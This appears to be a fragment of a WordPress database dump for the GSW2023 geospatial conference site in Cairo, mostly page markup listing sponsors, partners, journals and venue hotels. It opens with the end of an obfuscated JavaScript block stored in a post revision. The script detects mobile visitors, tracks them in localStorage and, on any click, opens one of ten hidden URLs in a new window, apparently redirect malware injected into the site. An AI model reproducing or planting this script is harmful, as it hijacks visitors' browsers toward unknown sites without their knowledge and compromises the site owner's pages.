[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 02:52:00','2023-08-16 02:52:00','',3066,'https://gsw2023.com/?p=5269',0,'revision','',0),
(5270,1,'2023-08-16 02:53:44','2023-08-16 02:53:44','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692154307798{margin-top: 100px !important;}\"]</p>\n<h3></h3>\n<h4></h4>\n<h4></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h4>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" 